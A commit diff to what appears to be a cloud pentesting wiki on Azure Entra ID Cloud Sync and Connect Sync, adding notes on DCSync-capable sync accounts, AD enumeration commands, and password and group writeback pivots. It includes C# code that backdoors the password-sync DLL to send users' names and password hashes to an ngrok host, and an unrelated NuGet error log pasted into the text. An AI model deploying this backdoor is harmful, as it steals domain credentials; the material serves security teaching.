improvements

carlospolop · carlospolop · commit b6870432f640 · 2025-07-24T00:04:54.000+02:00
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md
@@ -26,7 +26,7 @@ In order for this to work some principals are created in both Entra ID and the O
 > Among other permissions the Service Account **`provAgentgMSA`** has DCSync permissions, allowing **anyone that compromises it to compromise the whole directory**. For more information about [DCSync check this](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html).
 
 > [!NOTE]
-> Domain admins are not replicated because the Domain Admin group has the **`adminCount` attribute to 1**. But other users might be replicated and attackable if you compromises them from EntraID: https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/
+> By default users of known privileged groups like Domain Admins with the attribute **`adminCount` to 1 are not synchronized** with Entra ID for security reasons. However, other users that are part of privileged groups without this attribute or that are assigned high privileges directly **can be synchronized**.
 
 ## Password Sychronization
 
@@ -38,6 +38,7 @@ az-connect-sync.md
 
 - **Password hash synchronization** can be enabled so users will be able to **login into Entra ID using their passwords from AD**. Moreover, whenever a password is modified in AD, it'll be updated in Entra ID.
 - **Password writeback** can also be enabled, allowing users to modify their password in Entra ID automatically synchronizing their password in the on-premise domain. But according to the [current docs](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback#configure-password-writeback), for this is needed to use the Connect Agent, so take a look to the [Az Connect Sync section](./az-connect-sync.md) for more information.
+- **Groups writeback**: This feature allows group memberships from Entra ID to be synchronized back to the on-premises AD. This means that if a user is added to a group in Entra ID, they will also be added to the corresponding group in AD.
 
 
 ## Pivoting
@@ -84,12 +85,55 @@ https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/i
 {{#endref}}
 
 > [!NOTE]
-> Note that There isn't any way to give Azure or EntraID roles to synced users based on its attributes for example in the Cloud Sync configurations. However, in order to automatically grant permissions to synced users **dynamic groups might be used**, so always check for dynamic rules and potential ways to abuse them:
+> Note that There isn't any way to give Azure or EntraID roles to synced users based on its attributes for example in the Cloud Sync configurations. However, in order to automatically grant permissions to synced users some **Entra ID groups from AD** might be given permissions so the synced users inside those groups also receive them or **dynamic groups might be used**, so always check for dynamic rules and potential ways to abuse them:
 
 {{#ref}}
 ../../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
 {{#endref}}
 
+Regarding persistence [this blog post](https://tierzerosecurity.co.nz/2024/05/21/ms-entra-connect-sync-mothods.html) suggest that it's possible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) to backdoor the dll **`Microsoft.Online.Passwordsynchronisation.dll`** located in **`C:\Program Files\Microsoft Azure AD Sync\Bin`** that is used by the Cloud Sync agent to perform the password synchronization making it exfiltrate the password hashes of the users being synchronized to a remote server. The hashes are generated inside the class **`PasswordHashGenerator`** and the blog post suggest adding some code so the class looks like (note the `use System.Net` and the `WebClient` usage to exfiltrate the password hashes):
+
+```csharp
+using System;
+using System.Net;
+using Microsoft.Online.PasswordSynchronization.DirectoryReplicationServices;
+
+namespace Microsoft.Online.PasswordSynchronization
+{
+	// Token: 0x0200003E RID: 62
+	public class PasswordHashGenerator : ClearPasswordHashGenerator
+	{
+		// Token: 0x06000190 RID: 400 RVA: 0x00006DFC File Offset: 0x00004FFC
+		public override PasswordHashData CreatePasswordHash(ChangeObject changeObject)
+		{
+			PasswordHashData passwordHashData = base.CreatePasswordHash(changeObject);
+			try
+			{
+				using (WebClient webClient = new WebClient())
+				{
+					webClient.DownloadString("https://786a39c7cb68.ngrok-free.app?u=" + changeObject.DistinguishedName + "&p=" + passwordHashData.Hash);
+				}
+			}
+			catch (Exception)
+			{
+			}
+			return new PasswordHashData
+			{
+				Hash = OrgIdHashGenerator.Generate(passwordHashData.Hash),
+				RawHash = passwordHashData.RawHash
+			};
+		}
+	}
+}
+```
+
+
+NuGet Package restore failed for project AzTokenFinder: Unable to find version '4.3.2' of package 'System.Security.Cryptography.X509Certificates'.
+  C:\Program Files (x86)\Microsoft SDKs\NuGetPackages\: Package 'System.Security.Cryptography.X509Certificates.4.3.2' is not found on source 'C:\Program Files (x86)\Microsoft SDKs\NuGetPackages\'.
+. Please see Error List window for detailed warnings and errors.
+
+
+
 ### Entra ID --> AD
 
 - If **Password Writeback** is enabled, you could modify the password of some users from Entra ID and if you have access to the AD network, connect using them. For more info check the [Az Connect Sync section](./az-connect-sync.md) section for more information as the password writeback is configured using that agent.
@@ -105,25 +149,15 @@ So the attack surface (and usefulness) of this service is greatly reduced as an
 ### Enumeration
 
 ```bash
-Import-Module AADInternals
-
-# Check if the Cloud Sync is enabled in the tenant
-Invoke-AADIntReconAsOutsider -Domain <domain name> | Format-Table
-
 # Check for the gMSA SA
 Get-ADServiceAccount -Filter "ObjectClass -like 'msDS-GroupManagedServiceAccount'"
 
-
-
-
 # Get all the configured cloud sync agents (usually one per on-premise domain)
 ## In the machine name of each you can infer the name of the domain
 az rest \
   --method GET \
   --uri "https://graph.microsoft.com/beta/onPremisesPublishingProfiles('provisioning')/agents/?\$expand=agentGroups" \
   --headers "Content-Type=application/json"
-
-
 ```
 
 
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md
@@ -6,7 +6,7 @@
 
 [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sync-whatis) Microsoft Entra Connect synchronization services (Microsoft Entra Connect Sync) is a main component of Microsoft Entra Connect. It takes care of all the operations that are related to synchronize identity data between your on-premises environment and Microsoft Entra ID.
 
-In order to use it, it's needed to install the **`Microsoft Entra Connect Sync`** agent in a server inside your AD enviroment. This agent will be the one taking care of the synchronization from the AD side.
+In order to use it, it's needed to install the **`Microsoft Entra Connect Sync`** agent in a server inside your AD environment. This agent will be the one taking care of the synchronization from the AD side.
 
 
 <figure><img src="../../../../images/image (173).png" alt=""><figcaption></figcaption></figure>
@@ -21,7 +21,7 @@ az-cloud-sync.md
 
 - The account **`MSOL_<installationID>`** is automatically created in the on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**.
     - This means that anyone that compromises this account will be able to compromise the on-premise domain.
-- An managed service account **`ADSyncMSA<id>`** is created in the on-prem AD without any special default privileges.
+- A managed service account **`ADSyncMSA<id>`** is created in the on-prem AD without any special default privileges.
 - In Entra ID the Service Principal **`ConnectSyncProvisioning_ConnectSync_<id>`** is created with a certificate.
 
 ## Synchronize Passwords
@@ -38,6 +38,10 @@ The **hashes syncronization** occurs every **2 minutes**. However, by default, *
 
 When an on-prem user wants to access an Azure resource, the **authentication takes place on Azure AD**.
 
+> [!NOTE]
+> By default users of known privileged groups like Domain Admins with the attribute **`adminCount` to 1 are not synchronized** with Entra ID for security reasons. However, other users that are part of privileged groups without this attribute or that are assigned high privileges directly **can be synchronized**.
+
+
 ### Password Writeback
 
 This configuration allows to **sychronize passwords from Entra ID into AD** whe a user changes its password in Entra ID. Note that for the password writeback to work the `MSOL_<id>` user automatically generated in the AD needs to be granted [more privileges as indicated in the docs](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback) so it'll be able to **modify the passwords of any user in the AD**.
@@ -52,11 +56,40 @@ Domain admins and other users belonging to some pivileged groups are not replica
 - Users from the **`Cert Publishers Group`** that can publish certificates to Active Directory.
 - Users of any other group with high privileges without the **`adminCount` attribute to 1**.
 
-## Pivoting
+## Pivoting AD --> Entra ID
+
+### Enumerating Connect Sync
 
-### AD --> Entra ID
+Check for users:
+
+```bash
+# Check for the users created by the Connect Sync
+Install-WindowsFeature RSAT-AD-PowerShell
+Import-Module ActiveDirectory
+Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
+Get-ADServiceAccount -Filter "SamAccountName -like 'ADSyncMSA*'" -Properties SamAccountName,Description | Select-Object SamAccountName,Description | fl
+Get-ADUser -Filter "samAccountName -like 'Sync_*'" -Properties * | select SamAccountName,Description | fl
+
+# Check it using raw LDAP queries without needing an external module
+$searcher = New-Object System.DirectoryServices.DirectorySearcher
+$searcher.Filter = "(samAccountName=MSOL_*)"
+$searcher.FindAll()
+$searcher.Filter = "(samAccountName=ADSyncMSA*)"
+$searcher.FindAll()
+$searcher.Filter = "(samAccountName=Sync_*)"
+$searcher.FindAll()
+```
+
+Check for the **Connect Sync configuration** (if any):
+
+```bash
+az rest --url "https://graph.microsoft.com/v1.0/directory/onPremisesSynchronization"
+# Check if password sychronization is enabled, if password and group writeback are enabled...
+```
 
-Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\
+### Finding the passwords
+
+The passwords of the **`MSOL_*`** user (and the **Sync\_\*** user if created) are **stored in a SQL server** on the server where **Entra ID Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\
 The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
 
 It's possible to extract the configuration from one of the tables, being one encrypted:
@@ -67,18 +100,6 @@ The **encrypted configuration** is encrypted with **DPAPI** and it contains the
 
 You can find a [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg).
 
-### Finding the **Azure AD connect server**
-
-If the **server where Azure AD connect is installed** is domain joined (recommended in the docs), it's possible to find it with:
-
-```bash
-# ActiveDirectory module
-Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
-
-#Azure AD module
-Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
-```
-
 ### Abusing MSOL\_\*
 
 ```bash
@@ -178,6 +199,11 @@ It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses.
 seamless-sso.md
 {{#endref}}
 
+## Pivoting Entra ID --> AD
+
+- If password writeback is enabled, you can **modify the password of any user in the AD** that is synchronized with Entra ID.
+- If groups writeback is enabled, you can **add users to privileged groups** in Entra ID that are synchronized with the AD.
+
 ## References
 
 - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md
